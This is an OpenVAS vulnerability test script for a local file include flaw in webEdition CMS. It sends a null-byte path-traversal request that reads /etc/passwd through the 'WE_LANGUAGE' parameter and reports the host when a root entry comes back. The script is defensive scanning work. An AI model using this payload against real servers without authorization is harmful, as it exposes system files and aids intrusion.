###############################################################################
# OpenVAS Vulnerability Test
# $Id: webEdition_34323.nasl 3026 2009-04-05 11:52:05Z mime $
#
# webEdition CMS 'WE_LANGUAGE' Parameter Local File Include
# Vulnerability
#
# Authors:
# Michael Meyer
#
# Copyright:
# Copyright (c) 2009 Michael Meyer
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License version 2
# (or any later version), as published by the Free Software Foundation.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
###############################################################################

if (description)
{
 script_id(100103);
 script_bugtraq_id(34323);
 script_version ("1.0");

 script_name(english:"webEdition CMS 'WE_LANGUAGE' Parameter Local File Include Vulnerability");
 desc["english"] = "

 Overview:
  webEdition CMS is prone to a local file-include vulnerability
  because it fails to properly sanitize user-supplied input.

  An attacker can exploit this vulnerability to view and execute
  arbitrary local files in the context of the webserver process. This
  may aid in further attacks.

  webEdition CMS 6.0.0.4 is vulnerable; other versions may also be
  affected. 

 Risk factor : Medium";

 script_description(english:desc["english"]);
 script_summary(english:"Determine if webEdition is prone to Local File Include Vulnerability");
 script_category(ACT_GATHER_INFO);
 script_family(english:"Web application abuses");
 script_copyright(english:"This script is Copyright (C) 2009 Michael Meyer");
 script_dependencie("find_service.nes", "http_version.nasl");
 script_require_ports("Services/www", 80);
 script_exclude_keys("Settings/disable_cgi_scanning");
 exit(0);
}

include("http_func.inc");
include("http_keepalive.inc");

port = get_http_port(default:80);

if(!get_port_state(port))exit(0);
if(!can_host_php(port:port)) exit(0);

dir = make_list("/webEdition","/cms",cgi_dirs());

foreach d (dir)
{ 
 url = string(d, '/index.php?WE_LANGUAGE=../../../../../../../../etc/passwd%00');
 req = http_get(item:url, port:port);
 buf = http_keepalive_send_recv(port:port, data:req, bodyonly:FALSE);
 if( buf == NULL )continue;

 if ( egrep(pattern:"root:.*:0:[01]:.*", string: buf) )
     
 	{    
       	  security_warning(port:port);
          exit(0);
        }
}

exit(0);
